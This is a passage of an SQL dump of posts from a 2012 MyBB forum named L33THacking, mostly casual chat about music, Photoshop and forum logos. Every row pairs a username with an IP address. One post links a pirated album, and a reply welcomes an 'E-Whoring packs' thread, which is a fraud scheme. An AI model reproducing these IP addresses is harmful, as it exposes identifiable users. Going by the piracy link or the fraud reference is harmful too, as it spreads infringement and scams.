'0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2356', '489', '0', '8', 'What are your favorite lyrics?', '0', '82', 'iTzIpod', '1348106137', 'Lyrics are a powerful way to transmit emotions. What are some of you favorite lyrics? All of the lyrics in the song \'Mr. Simple\' by Super Junior are lovely. They can make me feel great on the saddest day on planet Earth. My favorite part is when Heechul sings \'Grades can be good or bad, thats just how it is. Performances can go up or down, it happens.\', very powerful lyrics to me. Though its KPop, I really suggest you take a listen. They\'re subtitles. [video=youtube]http://www.youtube.com/watch?v=0Z9VEzMNFag[/video]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd34f1f75e2b95b98527dae69f0b8c26b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2357', '479', '2329', '49', 'RE: [Suggestion] Forum Logo resized', '0', '1', 't3h jok3r', '1348106145', 'Cool, I will let you know. The text looks perfect to me but I can be wrong, I think the icon needs to be smaller.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '8a7d7c475bbb6fb1d22f92f8cb82a545', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2358', '479', '2357', '49', 'RE: [Suggestion] Forum Logo resized', '0', '82', 'iTzIpod', '1348106321', '[quote=\'t3h jok3r\' pid=\'2357\' dateline=\'1348106145\'] Cool, I will let you know. The text looks perfect to me but I can be wrong, I think the icon needs to be smaller. [/quote] In my opinion, I think it\'s the text size and logo/icon size.. Just shrink it by a little and that\'s it. Because on my Mobile, the tabs are all pushed to the right making it overlap each other. (Tabs = Home, Upgrade, Search, Member List, Help, Contact)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '96455fbacd2f31a4423d61e5442ed3ff', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2359', '487', '2354', '56', 'RE: Corrupt a wish', '0', '1', 't3h jok3r', '1348106347', 'Too sad because then you would have more hates than lovers. I wish educational shows like prison break never end.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '6c5c72cf1a8e84a139027bcf793c8629', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2360', '485', '2352', '19', 'RE: [Announcement] Switching Userbars?', '0', '1', 't3h jok3r', '1348106391', 'It would be better if you post your new userbar so people can tell if they find the new one better or not.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'eb33bcbea6649797a955440a9ccd39df', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2361', '462', '2181', '35', 'RE: Vote for LHs new logo', '0', '82', 'iTzIpod', '1348106437', '/Request Close Thread. Logo has been chosen. Thanks Reloadzor for an awesome logo. Your GFX never depresses me.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c268abb10428e7bfcdd50e435578114f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2362', '472', '2347', '7', 'RE: School story', '0', '1', 't3h jok3r', '1348106480', '[quote=\'Slender Man\' pid=\'2347\' dateline=\'1348093263\'] Nice one, Some teachers are really dumb... lol [/quote] Lol one of my teachers said that only professional companies can buy .com domains.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '17bec3083f4cd5a8cfa613af1d2a296b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2363', '484', '2345', '4', 'RE: Slender Man here.', '0', '1', 't3h jok3r', '1348106538', 'Welcome to L33THacking Slender Man. If you have any questions feel free to contact any Staff member. Hope you like L33THacking', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'a03adee4c33a775337823d6148742868', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2364', '390', '2141', '35', 'RE: Which Photoshop version do you use?', '0', '82', 'iTzIpod', '1348106560', '[quote=\'MistaCode\' pid=\'2141\' dateline=\'1347811593\'] I use CS5 [b]Don\'t want to download CS6 yet[/b] :D Well CS6 has awesome features, I saw an tutorial somewhere doing Cray to womens bodies ;) [/quote] Why don\'t you want to download it yet? O_o CS5 is good too but I don\'t see why not try CS6.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '64de2b131799f85021eef5c45e8f7d06', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2365', '472', '2362', '7', 'RE: School story', '0', '82', 'iTzIpod', '1348106640', '[quote=\'t3h jok3r\' pid=\'2362\' dateline=\'1348106480\'] [quote=\'Slender Man\' pid=\'2347\' dateline=\'1348093263\'] Nice one, Some teachers are really dumb... lol [/quote] Lol one of my teachers said that only professional companies can buy .com domains. [/quote] :roflol: Omg.. We should have a Facepalm Emote.. -.- :facepalm: :D -Insert Facepalm.jpeg here-', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b5ea440cf620612e83a18135727a5f7f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2366', '487', '2359', '56', 'RE: Corrupt a wish', '0', '82', 'iTzIpod', '1348106862', '[quote=\'t3h jok3r\' pid=\'2359\' dateline=\'1348106347\'] Too sad because then you would have more hates than lovers. I wish educational shows like prison break never end. [/quote] Omg. Speaking of PB, I finished the whole series (Season 1-4) today. Not everything in 1 day but I finally finished watching their last episode today. :( It was so sad. (No Spoilers) so.. OT: Granted, but the characters got old and died. (I regret saying that :p) I wish that too. ----- Wish: I wish I was a girl for a day with big boobs and a 24/7 wet pussy ;) LOL', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '86447c07740e2bfe15cdc23dc3bb5f0b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2367', '485', '2352', '19', 'RE: [?] Switching Userbars?', '0', '82', 'iTzIpod', '1348106911', 'No, I need someone to make me one since my Userbars and GFX Skills are trash. -.- [quote=iTzIpod] And so I have been thinking about switching them with something else. I really don\'t know what the Icon should be. But I really dig sexy userbars :3 Animated ones are sexy too. [b]If you\'d like, you can try out for this. If you make something good, and I like it, you will be rewarded..[/b] [/quote]', '24.212.197.164', '416597412', '1', '0', '82', '1348106969', '1', '936c3e0e42defcc3db4f590258dfa20f', '0', '1348106969'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2369', '390', '1796', '35', 'RE: Which Photoshop version do you use?', '0', '194', 'Slender Man', '1348107692', 'I use CS5 Extended Edition, or whatever you call it. I rarely use it though. I\'m not very good with it.', '99.108.180.49', '1668068401', '1', '0', '0', '0', '1', 'e678f763194629fc44a293218852b743', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2370', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '1', 't3h jok3r', '1348107751', 'I could a quick question, can I move this thread to the graphics section so that non-unique members could also request? Leaving discussion on OP and I will personally move this thread if the OP agrees.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '9fc1221f5da8feccb4dbac35167c2896', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2371', '485', '2352', '19', 'RE: [?] Switching Userbars?', '0', '1', 't3h jok3r', '1348107784', 'Uhh ok. Then I guess we have to wait because I don\'t have my PC with me so don\'t have PS.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f50db6c65e8df26647d778abfa26b635', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2372', '390', '2369', '35', 'RE: Which Photoshop version do you use?', '0', '82', 'iTzIpod', '1348107951', '[quote=\'Slender Man\' pid=\'2369\' dateline=\'1348107692\'] I use CS5 Extended Edition, or whatever you call it. I rarely use it though. I\'m not very good with it. [/quote] You can learn. It\'s really fun and easy to use Photoshop. I learned it in a couple minutes. - Just the basics. I just looked at 1 Youtube Video and basically learned how to use Photoshop instantly :p This was like during the summer or something. Or I can probably teach you :3 It\'s ok if you\'re not very good with it. My GFX Skills may be good compared to a noob, but when it\'s compared to a pro, then it sucks.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '66909c091b273d6d59e7a810e2bda791', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2373', '485', '2352', '19', 'RE: [?] Switching Userbars?', '0', '82', 'iTzIpod', '1348108038', 'I made a request in Reloadzor\'s thread. He\'s interested. Hopefully it\'s better than our current userbar.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1eda85b4634f570fa4bd58af33602533', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2374', '431', '2370', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '82', 'iTzIpod', '1348108190', '[quote=\'t3h jok3r\' pid=\'2370\' dateline=\'1348107751\'] I could a quick question, can I move this thread to the graphics section so that non-unique members could also request? Leaving discussion on OP and I will personally move this thread if the OP agrees. [/quote] He\'s gonna have to change his thread title & thread description. Also, he\'s gonna be getting loads of requests probably.. He did state he was busy.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e7ee41617d9b731859f568494e4d82c1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2375', '487', '2354', '56', 'RE: Corrupt a wish', '0', '194', 'Slender Man', '1348108217', 'Too bad, she has saggy boobs and is a man. XD I wish I was President :D', '99.108.180.49', '1668068401', '1', '0', '0', '0', '1', 'c32ccc7e9e1c5b61fcafc0c9366497e5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2376', '462', '2181', '35', 'RE: Vote for LHs new logo', '0', '194', 'Slender Man', '1348108388', 'I voted for number one, It think it looks good.', '99.108.180.49', '1668068401', '1', '0', '0', '0', '1', '862a7996e7acc33f4ab2b0bc3e4e32a9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2377', '489', '2356', '8', 'RE: What are your favorite lyrics?', '0', '194', 'Slender Man', '1348108828', 'I would say my favorite lyrics are from a song called Photograph by Nickelback. Brings back memories. Here are some lyrics: Remember the old arcade? Blew every dollar that we ever made The cops hated us hanging out They said somebody went and burned it down We used to listen to the radio And sing along with every song we know We said someday we\'d find out how if feels To sing to more than just the steering wheel. Kim\'s the first girl I kissed I was so nervous that I nearly missed She\'s had a couple of kids since then I haven\'t seen her since God knows when Oh oh oh Oh God I Every memory of walking out the front door I found the photo of the friend that I was looking for It\'s hard to say it, time to say it Goodbye, goodbye I miss that town I miss their faces You can\'t erase You can\'t replace it', '99.108.180.49', '1668068401', '1', '0', '194', '1348109043', '1', 'c0af60cf55806465ab959db514848e89', '0', '1348109043'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2378', '488', '2355', '8', 'RE: What are you listening to?', '0', '194', 'Slender Man', '1348109278', 'Song Link: http://www.youtube.com/watch?v=JU1BlSgTXxw Artist: Rise Against Song: Savior Enjoy!', '99.108.180.49', '1668068401', '1', '0', '194', '1348109302', '1', '2e3fa24893bd9bff4630f82296839d64', '0', '1348109302'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2379', '479', '2358', '49', 'RE: [Suggestion] Forum Logo resized', '0', '1', 't3h jok3r', '1348109309', '[quote=\'iTzIpod\' pid=\'2358\' dateline=\'1348106321\'] [quote=\'t3h jok3r\' pid=\'2357\' dateline=\'1348106145\'] Cool, I will let you know. The text looks perfect to me but I can be wrong, I think the icon needs to be smaller. [/quote] In my opinion, I think it\'s the text size and logo/icon size.. Just shrink it by a little and that\'s it. Because on my Mobile, the tabs are all pushed to the right making it overlap each other. (Tabs = Home, Upgrade, Search, Member List, Help, Contact) [/quote] Well every phone has a different screen resolution. I would say lets wait til the logo gets centered then I will check through all kinds of devices. Also it\'s toplinks (AKA header links)', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'cad1a46ea9b505aef645fd0e6e823fca', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2380', '487', '2375', '56', 'RE: Corrupt a wish', '0', '1', 't3h jok3r', '1348109426', '[quote=\'Slender Man\' pid=\'2375\' dateline=\'1348108217\'] Too bad, she has saggy boobs and is a man. XD I wish I was President :D [/quote] People would hate you for being selfish :P I wish I could fly.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '901af87158b8f33dfb21c2f6ef4b32a4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2381', '490', '0', '49', 'Forum Suggestion', '0', '194', 'Slender Man', '1348110073', 'How about adding a gaming forum?', '99.108.180.49', '1668068401', '1', '0', '0', '0', '1', 'fdbc316e696f6cc54de9093d1d9b9039', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2382', '489', '2377', '8', 'RE: What are your favorite lyrics?', '0', '82', 'iTzIpod', '1348110908', '[quote=\'Slender Man\' pid=\'2377\' dateline=\'1348108828\'] I would say my favorite lyrics are from a song called Photograph by Nickelback. Brings back memories. Here are some lyrics: Remember the old arcade? Blew every dollar that we ever made The cops hated us hanging out They said somebody went and burned it down We used to listen to the radio And sing along with every song we know We said someday we\'d find out how if feels To sing to more than just the steering wheel. Kim\'s the first girl I kissed I was so nervous that I nearly missed She\'s had a couple of kids since then I haven\'t seen her since God knows when Oh oh oh Oh God I Every memory of walking out the front door I found the photo of the friend that I was looking for It\'s hard to say it, time to say it Goodbye, goodbye I miss that town I miss their faces You can\'t erase You can\'t replace it [/quote] Wow, that song brings back a lot of memories for me :/ I remember the first time I listened to Nickelback, the time I listened to this song, the time I went to his concert... Brings back memories...', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5e28c5561e368b453216574cf72bc80e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2383', '491', '0', '8', 'Free Album!', '0', '194', 'Slender Man', '1348111300', 'I don\'t know if we have any Papa Roach fans on the site ,but I thought you guys might want to get in on this. I\'ve got a link to get his new album \"The Connection\" for FREE! Just released today! [align=center][img]http://www.mp3boo.com/cover/medium456.jpg[/img] Tracklist 01. Engage 02. Still Swingin’ 03. Where Did The Angels Go 04. Silence Is The Enemy 05. Before I Die 06. Wish You Never Met Me 07. Give Me Back My Life 08. Breathe You In 09. Leader Of The Broken Hearts 10. Not That Beautiful 11. Walking Dead 12. Won’t Let Up 13. As Far As I Remember Download Link: http://potload.com/0f429pfs1vih[/align] Also I can get other albums,(from other bands) So if you want a specific one. PM me.', '99.108.180.49', '1668068401', '1', '0', '194', '1348111493', '1', '051fc7fbf04c0cbf7c08e5821e525231', '0', '1348111493'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2384', '490', '2381', '49', 'RE: Forum Suggestion', '0', '82', 'iTzIpod', '1348111341', 'This has been requested many times. There is currently one in the process of making. Please be patient as it\'ll be added soon. :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '78a757ad173ecab8e582df139f74dd73', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2385', '489', '2356', '8', 'RE: What are your favorite lyrics?', '0', '194', 'Slender Man', '1348111389', 'I got to there concert every year. Always enjoy it.', '99.108.180.49', '1668068401', '1', '0', '0', '0', '1', 'fdfc1fc558cc40cf6e7d1ec3a226f8d3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2386', '490', '2381', '49', 'RE: Forum Suggestion', '0', '194', 'Slender Man', '1348111537', 'Oh, ok I\'ll wait for it. Thanks!', '99.108.180.49', '1668068401', '1', '0', '0', '0', '1', '0f85771f8e3c9ef5dea2a05a92c3212a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2387', '487', '2380', '56', 'RE: Corrupt a wish', '0', '82', 'iTzIpod', '1348111730', '[quote=\'t3h jok3r\' pid=\'2380\' dateline=\'1348109426\'] [quote=\'Slender Man\' pid=\'2375\' dateline=\'1348108217\'] Too bad, she has saggy boobs and is a man. XD I wish I was President :D [/quote] People would hate you for being selfish :P I wish I could fly. [/quote] Granted. But after being high up in the air, you start to fall with your parachute broken causing you to hit the ground face first at 700 km/hour ;) Wish: I wish I had 1000 posts.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e0be022590ce26593f8d8eb48764f030', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2388', '487', '2354', '56', 'RE: Corrupt a wish', '0', '194', 'Slender Man', '1348111885', 'To bad you get banned for spamming :p I wish I had unlimited wishes. :D', '99.108.180.49', '1668068401', '1', '0', '0', '0', '1', '39d113bdee2d24817c2686d72364d0ea', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2389', '171', '528', '8', 'RE: What Genre do you listen to?', '0', '194', 'Slender Man', '1348112901', 'I listen mostly to Rock/Alt-Metal. I don\'t really like the screamo stuff though. I also listen to rap and what ever is on the radio now a days.', '99.108.180.49', '1668068401', '1', '0', '0', '0', '1', '149c2893db1e79b23a7e5a637e118605', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2390', '234', '977', '17', 'RE: Free E-Whoring packs website plus free PORN', '0', '194', 'Slender Man', '1348113158', 'Sure why not I could use another addition to my collection...., I mean. Uh yeah E-whore... Let\'s do it. XD', '99.108.180.49', '1668068401', '1', '0', '0', '0', '1', '796ac3e92f0e1fb0e3f619cb9f5d222b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2391', '491', '2383', '8', 'RE: Free Album!', '0', '82', 'iTzIpod', '1348140927', 'I\'m not really a fan of Papa Roach. Although my friend might :D Thanks for contributing to L33t Hacking. =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd8840a43325127521e04c6e8504ba7f1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2392', '171', '2389', '8', 'RE: What Genre do you listen to?', '0', '82', 'iTzIpod', '1348141214', '[quote=\'Slender Man\' pid=\'2389\' dateline=\'1348112901\'] I listen mostly to Rock/Alt-Metal. I don\'t really like the screamo stuff though. I also listen to rap and [b]what ever is on the radio now a days.[/b] [/quote] I bet you like listening to Carly Rae Jepsen - Call Me Maybe because whenever I go somewhere, my radio is on. And I hear that song 24/7.. -.-', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '6d8756dd2583bac1bf6a3208f9fcd508', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2393', '487', '2354', '56', 'RE: Corrupt a wish', '0', '82', 'iTzIpod', '1348141307', 'Granted. But you died in a hole and so can no longer wish for anything. xD Wish: I wish I have 100+ Skype Contacts :( #Forever Alone', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd2ec8cf4d91162fc14ec38d5aee151ee', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2394', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '62', 'R?????zo?', '1348142922', 'for now on I will only do it for unique members, I been busy with my irl work so I cannot take loads of requests and please everyone. I\'m working on unique userbar now :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '3601c6a50dcd9fa866fc932c180eafb1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2395', '492', '0', '7', 'Where do you guys live? (BigPictures!!)', '0', '53', 'sirchamp', '1348145412', 'Lol. I have always wondered where you guys live. Please reply to this thread with the name of the country you come from and a few infos about it. It feels like I\'m the only one who lives in Europe. I live in a country called Switzerland. In switzerland we speak a dialect of german and normal german. Here are some pics of switzerland [img]http://upload.wikimedia.org/wikipedia/commons/thumb/f/f3/Flag_of_Switzerland.svg/200px-Flag_of_Switzerland.svg.png[/img] [img]http://www.web-kuchi.ch/HotPotatoes/Geografie_ch/kantone/schweiz.gif[/img] [img]http://www.berge.ch/berge_az/t/tagderberge/tagderberge.jpg[/img] [img]http://www.schweiz-reisefuehrer.info/uploads//startseite-reisefuehrer-schweiz2.jpg[/img] [img]http://www.1st-hotel-schweiz.de/uploads/pics/appenzell-landschaft.gif[/img] [img]http://www.rickenbach.ch/libraries.bilder/sempachersee.jpg[/img] And here are pictures of what I see when I look out of the window [img]http://www.abload.de/img/30714q81.jpg[/img] [img]http://www.abload.de/img/308v7qam.jpg[/img] [img]http://www.abload.de/img/3098prze.jpg[/img] [img]http://www.abload.de/img/310p7q2b.jpg[/img] [img]http://www.abload.de/img/311xnoyz.jpg[/img] [img]http://www.abload.de/img/312eap20.jpg[/img] [img]http://www.abload.de/img/313s4rc5.jpg[/img] And a small video of my village. [video=youtube]http://www.youtube.com/watch?v=moZigZazGX4[/video]', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '18a4a21cd86f922e10a6e59c257049ef', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2396', '492', '2395', '7', 'RE: Where do you guys live? (BigPictures!!)', '0', '61', 'NXK', '1348149873', 'I\'m from ontario canada. Id post pics But i\'m on my phone.', '38.104.158.106', '644390506', '1', '0', '0', '0', '1', '115a2926813b1a56b6993d5ccedd6386', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2397', 